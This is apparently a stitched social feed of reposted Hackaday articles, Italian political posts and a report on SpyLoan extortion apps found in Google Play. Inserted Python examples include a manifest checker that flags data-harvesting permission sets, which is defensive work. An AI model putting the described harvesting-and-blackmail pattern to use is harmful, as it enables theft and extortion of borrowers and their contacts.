


Unique 3D Printer Has a Print Head With a Twist



If you’re used to thinking about 3D printing in Cartesian terms, prepare your brain for a bit of a twist with [Joshua Bird]’s 4-axis 3D printer that’s not quite like anything we’ve ever seen before.

The printer uses a rotary platform as a build plate, and has a linear rail and lead screw just outside the rim of the platform that serves as the Z axis. Where things get really interesting is the assembly that rides on the Z-axis, which [Joshua] calls a “Core R-Theta” mechanism. It’s an apt description, since as in a CoreXY motion system, it uses a pair of stepper motors and a continuous timing belt to achieve two axes of movement. However, rather than two linear axes, the motors can team up to move the whole print arm in and out along the radius of the build platform while also rotating the print head through almost 90 degrees.

The kinematic possibilities with this setup are really interesting. With the print head rotated perpendicular to the bed, it acts like a simple polar printer. But tilting the head allows you to print steep overhangs with no supports. [Joshua] printed a simple propeller as a demo, with the hub printed more or less traditionally while the blades are added with the head at steeper and steeper angles. As you can imagine, slicing is a bit of a mind-bender, and there are some practical problems such as print cooling, which [Joshua] addresses by piping in compressed air. You’ll want to see this in action, so check out the video below.
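To make the two-motor mixing concrete, the following is an added example and not [Joshua]'s firmware or anything from the original post. It models the Core R-Theta drive as a CoreXY-style differential: driving both motors the same way translates the arm along the bed radius, driving them in opposite directions tilts the head. The constants MM_PER_STEP and PIVOT_RADIUS_MM, the exact sum/difference mixing and all function names are assumptions for illustration; only the two-motor, single-belt arrangement and the roughly 90 degree tilt range come from the article.

```python
"""Core R-Theta motor mixing modelled as a CoreXY-style differential drive.

Added example. Assumptions (not stated in the article): belt travel per step,
an effective pulley radius at the head pivot, and CoreXY-style mixing where
the sum of the two belt displacements moves the radial carriage and the
difference tilts the print head.
"""
import math

MM_PER_STEP = 0.01               # assumed belt travel per motor step (mm)
PIVOT_RADIUS_MM = 20.0           # assumed effective pulley radius at the head pivot (mm)
MAX_TILT_RAD = math.radians(90)  # article: the head rotates through almost 90 degrees


def forward(steps_a, steps_b):
    """Motor step counts -> (radius_mm, tilt_rad) of the print head."""
    belt_a = steps_a * MM_PER_STEP
    belt_b = steps_b * MM_PER_STEP
    radius = (belt_a + belt_b) / 2.0                   # common mode: radial travel
    tilt = (belt_a - belt_b) / (2.0 * PIVOT_RADIUS_MM)  # differential: arc / radius
    return radius, tilt


def inverse(radius_mm, tilt_rad):
    """(radius_mm, tilt_rad) -> integer motor step counts, clamping the tilt.

    The tilt is clamped to the mechanical range before mixing so that a
    slicer asking for an impossible angle cannot drive the head into the bed.
    """
    tilt_rad = max(-MAX_TILT_RAD, min(MAX_TILT_RAD, tilt_rad))
    arc = tilt_rad * PIVOT_RADIUS_MM
    belt_a = radius_mm + arc
    belt_b = radius_mm - arc
    return round(belt_a / MM_PER_STEP), round(belt_b / MM_PER_STEP)


def cartesian_to_polar(x_mm, y_mm):
    """Bed-frame (x, y) -> (radius_mm, bed_rotation_rad).

    With the head perpendicular to the bed the machine is a plain polar
    printer: the bed supplies the angle, the arm supplies the radius.
    """
    return math.hypot(x_mm, y_mm), math.atan2(y_mm, x_mm)


def polar_to_cartesian(radius_mm, bed_rotation_rad):
    """Inverse of cartesian_to_polar, useful for checking a sliced toolpath."""
    return radius_mm * math.cos(bed_rotation_rad), radius_mm * math.sin(bed_rotation_rad)


if __name__ == "__main__":
    steps = inverse(50.0, math.radians(30))
    print("motor steps for r=50 mm, tilt=30 deg:", steps)
    print("round trip:", forward(*steps))
    print("r, bed angle for (30, 40):", cartesian_to_polar(30.0, 40.0))
```

Pure radial moves come out as equal step counts on both motors, pure tilts as equal and opposite counts, which is the same property that makes CoreXY belts share the load; the clamp in `inverse` is the kind of limit check a slicer for a machine like this needs before emitting head angles.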

This is a fantastic bit of work, and hats off to [Joshua] for working through all the complexities to bring us the first really new thing we’ve seen in 3D printing in a long time.

youtube.com/embed/VEgwnhLHy3g?…

Thanks to [Keith Olson], [grythumn], [Hari Wiguna], and [MrSVCD] for the near-simultaneous tips on this one.


hackaday.com/2024/12/02/unique…




The 33rd edition of JOB&Orienta has come to a close!

The #MIM took part in the event with over 70 sessions on the world of schooling and a space dedicated to guidance.

#MIM


A Free Speed Boost For Your Pi 5



The world of the overclocker contains many arcane tweaks to squeeze the last drops of performance from a computer, many of which require expert knowledge to understand. Happily for Raspberry Pi 5 owners the Pi engineers have come up with a set of tweaks you don’t have to be an overclocker to benefit from, working on the DRAM timings to extract a healthy speed boost. Serial Pi hacker [Jeff Geerling] has tested them and thinks they should be good for as much as 20% boost on a stock board. When overclocked to 3.2 GHz, he found an unbelievable 32% increase in performance.

We’re not DRAM experts here at Hackaday, but as we understand it the Pi engineers had been using timings from the Micron data sheets designed to play it safe. In consultation with Micron engineers they were able to use settings designed to be much faster, we gather by monitoring RAM temperature to ensure the chips stay within their parameters. Best of all, there’s no need to get down and dirty with the settings, and they can be available to all with a firmware update. It’s claimed this will help Pi 4 owners to some extent as well as those with a Pi 5, so even slightly older boards get some love. So if you have a Pi 5, don’t wait for the Pi 6, upgrade today, for free!


hackaday.com/2024/12/02/a-free…



Who is Tommaso Foti, the new Minister for European Affairs


@Politica interna, europea e internazionale
Tommaso Foti is the new Minister for European Affairs, the South, cohesion policies and the PNRR. The Fratelli d’Italia member takes over from Raffaele Fitto, just appointed Vice-President of the European Commission and Commissioner for



by Paolo Ferrero, from Il Fatto Quotidiano - At the last summit in Kazan on 22 and 23 October, the BRICS announced that they are working to create a system of international monetary exchange that does not use the dollar and therefore challenges its monopoly and power. This revolutionary prospect undermines [...]


Speech by WikiLeaks editor-in-chief Kristinn Hrafnsson at the presentation of Andrei Molodkin’s work dedicated to Julian Assange.


“I am part of a journalistic organisation, one of those who have faith in journalism. Journalism today is no longer what it was; it is disappearing. The power of journalism is being eroded and will probably die. This is the harsh reality we have to face. In our societies, in the West, journalism is under attack, the truth is […]


freeassangeitalia.it/intervent…

Gazzetta del Cadavere reshared this.




🔴🔴Speech by WikiLeaks editor-in-chief Kristinn Hrafnsson at the presentation of Andrei Molodkin’s work dedicated to Julian Assange.
Read the article on our website 👇
freeassangeitalia.it/intervent…



A Brief History of Calculator Watches



When humans counted on their fingers, everyone had a state-of-the-art (at the time) calculator at all times. But as we got smarter about calculation, we missed that convenience. When slide rules were king, techies were known to carry them around like swords swinging from their belts. These were replaced with electronic calculators, some also swinging from belt loops, but no matter how small they were, they still were not that handy, no pun intended. That changed around 1975. The Time Computer Calculator company produced an amazing calculator watch for Pulsar. At the time, Pulsar was a brand of the Hamilton Watch Company.
A Pulsar calculator watch (photo: The Smithsonian)
There were a few problems. First, the watch was thick. Despite its size, it had tiny keys, so you had to use a little stylus to push the keys — not as handy as you might wish. On top of that, 1975 display technology used power-hungry LEDs. So, the display was prone to turning off quickly, and the batteries died quickly.

Unsurprisingly, Hamilton, in conjunction with Electro/Data, had earlier rolled out the first LED watch in 1972. With an 18-karat gold case, it went for a cool $2,100 — a whole lot of money in 1972. The first calculator watch was also gold and went for almost $4,000. Soon, though, they brought out a stainless and a gold-filled version that came in at under $500.

Hewlett-Packard


The HP-01 (photo: [Stanlkocher] CC-BY-SA-3.0)

Not to be outdone, HP created the HP-01 in 1977. These also came in gold and stainless models. Prices ranged from $450 to $850. You needed a special kit to do your own battery changes, so that added to the price, too. It also required a stylus. Unlike other HP calculators, the HP-01 did not use RPN.

For such a hefty price, these calculators didn’t do much. They were generally “four-bangers” with a few extra features, but they were no scientific calculators by any stretch of the imagination. The HP did have time and date calculations and could even use a stopwatch as a data source.

More calculator watches appeared directly from Time Computer Calculator Company and several others, but none were ever more than an expensive novelty. There were a few from companies like Seiko and Citizen. LCD screens would wipe out LEDs in watches, including calculator watches.

Some lesser-known companies took their shots. Uranus Electronics was one. Hughes Aircraft also created an LED calculator watch with the name Compuchron.

Citizen had unusual round watches with tiny buttons around the circumference, including some that had scientific functions. These were the first calculator watches to use LCDs.

Seiko’s first entry had truly tiny buttons (see the video below). However, the C-515 had some of the nicest keys of the era, although design-wise, it was a bit blocky.

youtube.com/embed/8eeocDSZ4cY?…

youtube.com/embed/H-xnbrNLj9A?…

The calculator from National Semiconductor had a flip-down keyboard cover. (photo: [Mister RF] CC-BY-SA-4.0)

National Semiconductor produced a very powerful scientific calculator watch that was available under different names from different companies.

The National watch was a big hit in 1977 and a marvel of miniaturization. You can find some very detailed teardown pictures on Wikimedia Commons.

It is hard to say how many of these calculator watches were made and sold. Most are rare, and you would imagine the gold ones were not big production runs. Even the cheaper models seemed more like stunts than mass-market products.

Clearly, there was some demand, but things remained a niche market, and smaller players weeded out quickly. The calculator watch market was relatively sleepy until 1980 when Casio decided to make them.

Casio


The CFX-400 was a top-of-the-line scientific calculator that even did hex (photo: [Septagram] Public Domain)

Casio made a large variety of cheap watches. The Casio C-60 appeared in 1980, the first of their calculator watches. It would set the basic design for many of their future models.

The CA-50 was popular, and it appeared, along with the similar CA-53W, in popular movies, including Back to the Future II and III. These had tiny buttons, but you could carefully use them with your fingers. Some models had raised buttons. Others had flat buttons. A few even had a form of touch screen.

There were many variations in the Casio calculator watches. Some could store data like phone numbers and addresses. Others had scientific functions, like the excellent CFX-400 or the less-capable CFX-200. The CMD-40 even had a basic remote control.

The nicer models had metal cases, but many were plastic. There were even some that looked like a normal analog watch, but the top would flip up to reveal the calculator display and keyboard. Replacing the batteries on those is tricky, as you can see in the video below.

Calculator watches became something of a fad, especially with the pocket-protector crowd. However, like all things, they faded in popularity over time and now most are collector’s items.

youtube.com/embed/yeYmcdH8U7M?…

Today


You can find cheap calculator watches readily on the usual Chinese import sites. Casio still sells some vintage-series calculator watches, and there’s a brisk used market for the watches from any manufacturer. However, outside of the collectible value, most people switched to small calculators, PDAs, and — later — cell phones and smartwatches.

I owned several Casios, including a flip top and the FX-400. I also had the nice boxy Seiko. I don’t think they have made it unless they are hiding in a box somewhere waiting to be rediscovered. Which ones did you have? Do you have them now? Do you ever really use them?

Before you take me to task for not mentioning Sinclair’s wrist calculator, I will point out that it wasn’t really a watch. It was just a calculator that strapped to your wrist.

There have been DIY calculator watches, of course. It would be even easier to produce one today than ever before. It might be fun to grab one of the new ones and give it a brain upgrade. Let us know if you take up the challenge.

Featured image: “Casio Gold Calculator Watch” by [jonrawlinson].


hackaday.com/2024/12/02/a-brie…



The EU Council adopts new laws to strengthen EU cybersecurity

The article comes from #Euractiv Italia and was reshared on the Lemmy community @Intelligenza Artificiale
Strengthening the EU’s solidarity and its capacity to detect, prepare for and respond to cyber threats and incidents. That is the objective

Intelligenza Artificiale reshared this.



Not Just 'David Mayer': ChatGPT Breaks When Asked About Two Law Professors #OpenAI


Since 26 November, the Aleppo region has been at the centre of an unprecedented military escalation, with the joint offensive by Hay’at Tahrir al-Sham (HTS) and the Turkish-controlled Syrian National Army (SNA), which is putting the lives of thousands of civilians at risk, in particular those belonging to the Kurdish minority. The attacks have had devastating consequences, with the occupation of Shebah and Tal Rifaat by SNA forces and the forced exodus of around 200,000 civilians who had taken refuge there after the occupation of Afrin by the same forces in 2018.

In the Kurdish neighbourhoods of Aleppo, Seikh Maqsud and Ashrafieh, thousands of refugees fleeing the advance of HTS have found shelter. The People’s and Women’s Protection Units (YPG/YPJ) and the civilian population have firmly declared that they will not abandon their homes and will continue to resist the HTS and SNA forces. The situation is extremely tense, and the civilian population, already vulnerable, is facing an unprecedented siege and humanitarian crisis.

Behind this offensive, Turkey plays a decisive role in supporting the SNA and the presence of HTS in the region. Although HTS is recognised as a terrorist organisation by Turkey itself and is made up mainly of foreign fighters, its forces continue to operate with Ankara’s logistical, political and military backing. Turkey has been identified by many reports from independent organisations as responsible for the violence and human rights violations perpetrated by the groups under its patronage, which also include jihadist fighters linked to al-Qaeda and ISIS militants. Emblematic in this regard is the reported presence in Aleppo of Abu Hatem Shaqra, commander of the SNA’s Ahrar al-Sharqiya faction and the man who carried out the assassination of Hevrin Khalef, the Kurdish politician and secretary of the Syrian Future Party killed together with two colleagues in 2019.

The Rojava Revolution has represented a unique experience of self-determination, human rights and resistance against oppression. Born in the Kurdish lands of Northern Syria, the revolution has built a system that promotes gender equality, direct democracy and peaceful coexistence among different ethnic groups and religions. In a context of conflict and instability, Rojava has been a beacon of hope, showing the world that it is possible to build an inclusive and just society even under the most difficult conditions. The resistance of the Kurdish forces, including the YPG and YPJ, has had a decisive impact in the fight against the terrorism of the Islamic State, contributing to the stabilisation of the region. Today, however, ten years after the historic resistance of Kobane that put an end to the expansion of ISIS, this model of society is threatened by the Turkish-coordinated offensive of HTS and SNA, which seeks to annihilate not only the Kurdish people but also the values of freedom and democracy that Rojava embodies.

The appeal to the international community is urgent: rapid and decisive intervention is needed to stop the violence and avert a new humanitarian catastrophe. The future of Syria, and especially of the minorities who live there, is uncertain, but hope lies in international solidarity and in a concrete political and humanitarian response that can guarantee the security and dignity of all the peoples of the region and open the door to a political solution to the Syrian civil war.

We ask Italian citizens, associations, movements, trade unions, parties and political organisations, who have always shown closeness to the Kurdish people, to rally around the peoples of Rojava in this time of existential threats and to express the strong solidarity they need.

Kurdistan Information Office in Italy



Small Feathers, Big Effects: Reducing Stall Speeds With Strips Of Plastic



Birds have long been our inspiration for flight, and researchers at Princeton University have found a new trick in their arsenal: covert feathers. These small feathers on top of birds’ wings lay flat during normal flight but flare up in turbulence during landing. By attaching flexible plastic strips – “covert flaps” – to the top of a wing, the team has demonstrated impressive gains in aircraft performance at low speeds.

Wind tunnel tests and RC aircraft trials revealed a fascinating two-part mechanism. The front flaps interact with the turbulent shear layer, keeping it close to the wing surface, while the rear flap creates a “pressure dam” that prevents high-pressure air from moving forward. The result? Up to 15% increase in lift and 13% reduction in drag at low speeds. Unfortunately the main body of the paper is behind a paywall, but the video and abstract are still fascinating.

This innovation could be particularly valuable during takeoff and landing – phases where even a brief stall could spell disaster. The concept shares similarities with leading-edge slats found on STOL aircraft and fighter jets, which help maintain control at high angles of attack. Imitating feathers on aircraft wings can have some interesting applications, like improving control redundancy and efficiency.

youtube.com/embed/dLlJRujBWos?…


hackaday.com/2024/12/02/small-…



Is Saudi Arabia joining the Gcap programme? The opening by Italy and the United Kingdom

@Notizie dall'Italia e dal mondo

Riyadh could soon join the consortium for the sixth-generation fighter that will be developed by Italy, Japan and the United Kingdom. Saudi interest in the Gcap programme has been rumoured for some time, and now the first openings are starting to come from



Google Play Store: the Software Dumpster! 15 Malicious Apps Steal Data from 8 Million Users


McAfee analysts have found 15 malicious applications belonging to the SpyLoan family in the Google Play Store. In total, these applications have more than 8 million installations and targeted users in South America, South-East Asia and Africa. The most popular are listed below.

  • Préstamo Seguro-Rápido, Seguro – 1,000,000 downloads, mainly aimed at users in Mexico;
  • Préstamo Rápido-Credit Easy – 1,000,000 downloads, mainly aimed at Colombia;
  • ได้บาทง่ายๆ-สินเชื่อด่วน – 1,000,000 downloads, aimed at users in Senegal;
  • RupiahKilat-Dana cair – 1,000,000 downloads, also aimed at Senegal;
  • ยืมอย่างมีความสุข – เงินกู้ – 1,000,000 downloads, aimed at users in Thailand;
  • เงินมีความสุข – สินเชื่อด่วน – 1,000,000 downloads, also aimed at Thailand;
  • KreditKu-Uang Online – 500,000 downloads, mainly targeting users in Indonesia;
  • Dana Kilat-Pinjaman kecil – 500,000 downloads, another app mainly aimed at Indonesia.


All the applications have reportedly been removed from Google Play, but the researchers note that their presence in the store shows the persistence of the cybercriminals. This is not the first time such malware has been discovered in, and removed from, the official store.

For example, at the end of 2023, ESET specialists spotted 18 applications on Google Play that distributed SpyLoan and had been downloaded more than 12 million times.

SpyLoan apps appeared in 2020 and are usually advertised as financial tools offering users loans with quick approval, but the terms of these loans are often highly deceptive or simply fake.

Once the victim installs the SpyLoan app, they are asked to complete verification using a one-time password (OTP). This is how the attackers make sure the victim is in the right region. The user is then asked to provide sensitive identity documents, employer information and banking details.

In addition, SpyLoan applications always request excessive privileges on the device, including permission to use the camera (ostensibly to upload KYC photos) and access to the calendar, contacts, SMS, location, sensor data and so on. As a result, the app operators can steal sensitive data from the device and use it to blackmail the victim into paying.

The scammers can thus unexpectedly shorten the loan repayment period to a few days (or any arbitrary period), threaten the user and demand money, otherwise promising to leak their data or reveal secrets.

In other words, having taken out a loan through such an application, the user not only has to pay high interest rates but is also subjected to constant harassment by the SpyLoan operators, who blackmail them using the stolen information. Moreover, in some cases the scammers also contact the borrower’s family and friends, threatening them as well.
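The over-broad permission set is the one trait of these apps a reviewer can check mechanically before installation. The following is an added example, not McAfee’s or Google’s tooling: it reads a decoded AndroidManifest.xml (the manifest inside an APK is binary-encoded, so a decoder such as apktool is assumed to have run first), maps the requested permissions to the data categories the article says SpyLoan operators harvest, and raises an alert when a loan app asks for several of them at once. The permission strings are real Android identifiers; the sample manifests, the package names and the alert threshold are constructed for illustration.

```python
"""Flag loan/finance apps that request the data-harvesting permission set
described above.

Added example. Assumes a decoded (text) AndroidManifest.xml. The sample
manifests below are constructed; the permission names are real Android
identifiers. The threshold is a judgement call, not a published rule.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions grouped by the data the article says is stolen for extortion.
RISKY_PERMISSIONS = {
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.READ_SMS": "sms",
    "android.permission.RECEIVE_SMS": "sms",
    "android.permission.READ_CALENDAR": "calendar",
    "android.permission.ACCESS_FINE_LOCATION": "location",
    "android.permission.ACCESS_COARSE_LOCATION": "location",
    "android.permission.BODY_SENSORS": "sensors",
    "android.permission.CAMERA": "camera",
}

# A camera permission alone is plausible for a KYC selfie; contacts, SMS,
# calendar and location together are not needed to grant a loan.
ALERT_THRESHOLD = 3  # distinct data categories, not counting the camera

# Constructed sample: the permission pattern the article describes.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.quickloan">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CALENDAR"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <application android:label="QuickLoan"/>
</manifest>
"""

# Constructed sample: a loan app that only needs network access and a KYC photo.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.plainloan">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <application android:label="PlainLoan"/>
</manifest>
"""


def requested_permissions(manifest_xml):
    """Return every android:name declared in a <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return [el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")]


def assess(manifest_xml):
    """Summarise the risky permissions and decide whether to alert."""
    root = ET.fromstring(manifest_xml)
    perms = requested_permissions(manifest_xml)
    risky = sorted(p for p in perms if p in RISKY_PERMISSIONS)
    categories = {RISKY_PERMISSIONS[p] for p in risky}
    categories.discard("camera")  # tolerated on its own, see note above
    return {
        "package": root.get("package"),
        "risky_permissions": risky,
        "data_categories": sorted(categories),
        "alert": len(categories) >= ALERT_THRESHOLD,
    }


if __name__ == "__main__":
    for manifest in (SAMPLE_MANIFEST, BENIGN_MANIFEST):
        result = assess(manifest)
        print(result["package"], "ALERT" if result["alert"] else "ok",
              ", ".join(result["data_categories"]) or "-")
```

Counting distinct data categories rather than raw permission strings keeps the check robust against an app that lists both fine and coarse location, or both READ_SMS and RECEIVE_SMS, to pad the list; the same summary can be fed into an MDM or app-vetting pipeline that already has decoded manifests.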

The article Google Play Store: the Software Dumpster! 15 Malicious Apps Steal Data from 8 Million Users originally appeared on il blog della sicurezza informatica.



Exploring the Sounds and Sights Of Alien Worlds



The 20th century saw humankind’s first careful steps outside of the biosphere in which our species has evolved. Whereas before humans had experienced the bitter cold of high altitudes, the crushing pressures in Earth’s oceans, as well as the various soundscapes and vistas offered in Earth’s biosphere, beyond Earth’s atmosphere we encountered something completely new. Departing Earth’s gravitational embrace, the first humans who ventured into space could see the glowing biosphere superimposed against the seemingly black void of space, in which stars, planets and more would only appear when blending out the intense light from the Earth and its life-giving Sun.

Years later, the first humans to set foot on the Moon experienced again something unlike anything anyone has experienced since. Walking around on the lunar regolith in almost complete vacuum and with very low gravity compared to Earth, it was both strangely familiar and hauntingly alien. Although humans haven’t set foot on Mars yet, we have done the next best thing, with a range of robotic explorers with cameras and microphones to record the experience for us here back on Earth.

Unlike the Moon, Mars has a thin but very real atmosphere which permits the travel of soundwaves, so what does the planet sound like? Despite what fictional stories like Weir’s The Martian like to claim, reality is in fact stranger than fiction, with for example a 2024 research article by Martin Gillier et al. as published in JGR Planets finding highly variable acoustics during Mars’ seasons. How much of what we consider to be ‘normal’ is just Earth’s normal?

Spherical Astronauts On Mars

Curiosity rover’s robotic arm showing drill in place, February 2013 (Credit: NASA/JPL-Caltech)
A major limitation with experiencing extraterrestrial worlds is of course that even if we could easily zip over to the more distant ones in a faster-than-light spacecraft, our bodies have evolved within the confines of the Earth’s biosphere and explicitly just the biosphere as it has existed only relatively recently, geologically speaking. Even the atmospheric conditions of the Earth’s Cambrian period would be lethal to humans, with virtually no oxygen to breathe. It’s highly unlikely that we will find any planets out there that are at least as friendly to human life as the Cambrian period would be to our astronauts, so our experience of alien worlds will most assuredly not match those of the average Star Trek episode.

But assume, if you will, that our perfectly spherical, friction-less astronauts are as impervious to cold, heat and radiation as the intrepid robotic explorers which currently peruse the surface of Mars or which have in the past prodded the Venusian atmosphere and its surface. If stepping outside the lander in this ideal scenario, what can our robotic friends tell us about what walking on Mars would be like?

With Mars much further away from the Sun, its light is dimmer, though still bright enough to make out the rocky reddish, brown, greenish and tan coloring. Most steps that you take will leave behind a footprint, albeit not as deep as on Earth due to Mars gravity of only about 0.38 g, or roughly a third of Earth’s. This does preclude the option of bunny hopping across the surface as on the Moon with its 0.165 g.

Mars’ atmosphere is quite thin, also on account of the planet having lost its magnetosphere a long time ago, exposing the atmosphere to the solar wind as it rips and tears away at it. With an atmospheric pressure of at most 1,150 Pa (on the Hellas Planitia plain) it’s akin to being on Earth at an altitude of 35 km, or well above the average commercial jetliner’s cruising altitude of below 12 km. Even so, sounds are audible, albeit attenuated courtesy of the 96% CO2 content of the Martian atmosphere. This makes everything sound muted and quite different from what we are used to on Earth.

Whether you stand still and take in the vista surrounding you, or move around, you can hear something like what the Perseverance rover recorded using its twin microphones:

youtube.com/embed/GHenFGnixzU?…

Perseverance also captured the noise of the Ingenuity helicopter as it flew near the rover at a distance of 80 meters, all of which provided researchers with invaluable data on how sound propagates on Mars. In the earlier referenced paper by Martin Gillier et al. the attenuation is calculated to be 500 times higher for low frequencies and 10 times higher at high frequencies than in Earth’s atmosphere at sea level.

Meanwhile the speed of sound at the Martian surface varies as the CO2 in the atmosphere increases or decreases with the seasons, especially near the poles where carbon dioxide ice is known to exist. Compared to the speed of sound in Earth’s atmosphere of 343 m/s, on Mars you can expect around 252 m/s, although this will differ wildly per season and with the altitude you are at.

Glorified as Mars may be in The Martian and other works of fiction, the experience of walking around on its surface would be mostly one of eerie disconnect due to the lower gravity and the muffled sounds, including those made by one’s own boots. Assuming that the radiation blasting the Martian surface and the intense temperature swings are no concern, this might yet be the perfect vacation spot for some astronauts.

From Venus With Love

The Venus surface, as photographed by the USSR Venera 13 in 1982 (recolorized).
The Soviet Venera 13 and 14 missions featured the first landers to Venus that were equipped with microphones. These were active during their final descent, as well as the workings of the pyrotechnics and surface drill, prior to the quiet observation of the lander with its scientific instruments. Below is embedded part of the audio from the Venera 14 mission (also on Archive.org).
hackaday.com/wp-content/upload…
Based on these audio recordings, the wind speed on Venus’ surface was calculated to average between 0.3 and 0.5 m/s, which doesn’t seem much until you realize that this is at a pressure of around 9.5 MPa (94 times Earth’s atmosphere) and a temperature of 465 ℃. These findings were covered in a 1982 paper by L. V. Ksanfomaliti et al. (PDF) as submitted to Soviet Astronomy Letters.

The effect for our theoretical astronaut would be akin to being crushed and burned at the same time, while the thick, mostly CO2-based atmosphere slowly churns past.

It is for this reason that our less-invincible astronauts would remain in the Venusian atmosphere at a more agreeable pressure and temperature level. In such a floating colony the experience would be much more akin to being on Earth at ground level, if you excuse the sulfuric rain droplets, of course.

Welcome To Europa


So far our photographic and auditory collection of extraterrestrial planets is still rather limited, with Mars and Venus being the two primary examples where we have collected both types of recordings on their respective surfaces. However, depending on how things work out, we may soon be adding Jupiter’s moon Europa to this list. This is perhaps the most intriguing target in our solar system which we have not visited yet in any significant detail, despite it being assumed to be a water ice-covered moon that is slightly smaller than Earth’s Moon, with potentially liquid water below the ice.
Europa’s interior and thin, mostly oxygen and water vapor atmosphere. (Credit: NASA/JPL-Caltech)
Recently the Europa Clipper spacecraft was launched on its multi-year mission for a rendezvous with Europa by April 2030. One of its mission goals at Europa is to determine a suitable landing site for the proposed Europa Lander, which – if funded – would land on Europa in the 2030s where it would be able to examine and image the surface. Sadly Europa does not have much of an atmosphere, much like Earth’s Moon, but it might make for a fascinating place to do some ice skating for our radiation-proof astronauts. If there is a liquid ocean underneath the ice as suspected, then deep-sea diving on Europa is definitely also on the menu, barring any scary oceanic lifeforms in said oceans.

Beyond these places in our solar system the sounds and sights sadly become a bit murky. Mercury is a Sun-blasted rock, while Pluto is a darkness-shrouded rock, and all of Jupiter, Saturn, Neptune and Uranus are gas giants. Beyond perhaps a couple of the more interesting moons surrounding these gas giants we will have to look beyond this solar system to find more interesting extraterrestrial sights and sounds. Fortunately for this we will only have to send out our faster-than-light spacecraft into deep space, as there are still billions upon billions of star systems to examine and places to experience. Makes you realize how good we’ve got it here on Earth.


hackaday.com/2024/12/02/explor…



Former ambassador Enrico Calamai has decided to join Rifondazione Comunista and has explained his reasons in a letter that we are publishing. “The membership of our party of a personality of absolute worth such as Enrico Calamai, for whom the word hero can be used without rhetoric, honours us and encourages us to hold out in these very [...]


ESP32 Powers DIY Smart Energy Meter



Energy is expensive these days. There’s no getting around it. If, like [Giovanni], you want to keep better track of your usage, you might find value in his DIY energy meter build.

[Giovanni] built his energy meter to monitor energy usage in his whole home. An ESP32 serves as the heart of this build. It’s hooked up with a JSY-MK-194G energy metering module, which uses a current clamp and transformer in order to accurately monitor the amount of energy passing through the mains connection to his home. With this setup, it’s possible to track voltage, current, frequency, and power factor, so you can really nerd out over the electrical specifics of what’s going on. Results are then shared with Home Assistant via the ESPHome plugin and the ESP32’s WiFi connection. This allows [Giovanni] to see plots of live and historical data from the power meter via his smartphone.
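The JSY-MK-194G does the metering arithmetic in hardware and hands the ESP32 finished numbers, but it helps to see what the four quantities the article lists actually are. The following is an added example, not [Giovanni]’s code, the module’s firmware or anything from ESPHome: it constructs sampled voltage and current waveforms with a chosen phase lag and computes RMS voltage, RMS current, mains frequency, real power and power factor from them. The sampling rate, amplitudes and the 30 degree lag are constructed values chosen to make the results easy to check.

```python
"""RMS, frequency and power factor from sampled mains waveforms.

Added example (not the energy meter project's code). The waveforms are
constructed: a 50 Hz sine pair with the current lagging the voltage, which
is what an inductive load looks like to a metering chip.
"""
import math


def sample_waveforms(v_rms=230.0, i_rms=5.0, freq_hz=50.0,
                     phase_lag_rad=0.0, fs_hz=5000.0, cycles=10):
    """Construct voltage and current sample lists plus the sample period."""
    n = int(fs_hz / freq_hz * cycles)          # whole cycles, so means are exact
    dt = 1.0 / fs_hz
    w = 2 * math.pi * freq_hz
    offset = 0.3  # small phase offset so no sample lands exactly on a zero crossing
    v = [math.sqrt(2) * v_rms * math.sin(w * k * dt + offset) for k in range(n)]
    i = [math.sqrt(2) * i_rms * math.sin(w * k * dt + offset - phase_lag_rad)
         for k in range(n)]
    return v, i, dt


def rms(samples):
    """Root mean square of a sample list."""
    return math.sqrt(sum(s * s for s in samples) / len(samples))


def frequency_hz(samples, dt):
    """Estimate frequency from linearly interpolated rising zero crossings."""
    crossings = []
    for k in range(1, len(samples)):
        a, b = samples[k - 1], samples[k]
        if a < 0 <= b:
            crossings.append((k - 1 + (-a) / (b - a)) * dt)
    if len(crossings) < 2:
        return None
    return (len(crossings) - 1) / (crossings[-1] - crossings[0])


def power_metrics(v, i, dt):
    """Voltage, current, frequency, real/apparent power and power factor."""
    v_rms, i_rms = rms(v), rms(i)
    real_w = sum(a * b for a, b in zip(v, i)) / len(v)   # mean instantaneous power
    apparent_va = v_rms * i_rms
    return {
        "v_rms": v_rms,
        "i_rms": i_rms,
        "freq_hz": frequency_hz(v, dt),
        "real_w": real_w,
        "apparent_va": apparent_va,
        "power_factor": real_w / apparent_va if apparent_va else 0.0,
    }


if __name__ == "__main__":
    v, i, dt = sample_waveforms(phase_lag_rad=math.radians(30))
    for key, value in power_metrics(v, i, dt).items():
        print(f"{key:>13}: {value:.3f}")
```

With a 30 degree lag the power factor comes out as cos(30°) ≈ 0.866 and real power as 230 V × 5 A × 0.866 ≈ 996 W, while apparent power stays at 1150 VA; the gap between the two is what a utility bills on commercial tariffs and what a cheap meter that only multiplies RMS values would get wrong.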

A project like this one is a great way to explore saving energy, particularly if you live somewhere without a smart meter or any other sort of accessible usage tracking. We’ve featured some of [Giovanni]’s neat projects before, too.

youtube.com/embed/hP4fDkFyy3w?…


hackaday.com/2024/12/02/esp32-…



Instant transfers: how the security rules change with the new EU regulation


@Informatica (Italy e non Italy 😁)
The regulation, which will take effect from January 2025, improves the efficiency of instant transfers but also raises important cybersecurity questions. Payment service providers (PSPs) will have to face



DDoS attacks are on the rise. And defending against them is anything but easy


@Informatica (Italy e non Italy 😁)
An F5 Labs report shows that DDoS attacks are alive and thriving, including at the expense of Italian organisations. Among the notable victims is the Vatican’s website. The expert’s view
The article DDoS attacks are on the rise. And defending against them is anything but easy comes from Cyber Security



Management software: a code of conduct sets rules and limits for data processing


@Informatica (Italy e non Italy 😁)
The Italian Data Protection Authority (Garante privacy) has approved the first code of conduct for companies operating in Italy in the production of management software. Promoted by Assosoftware, the document sets the rules and the



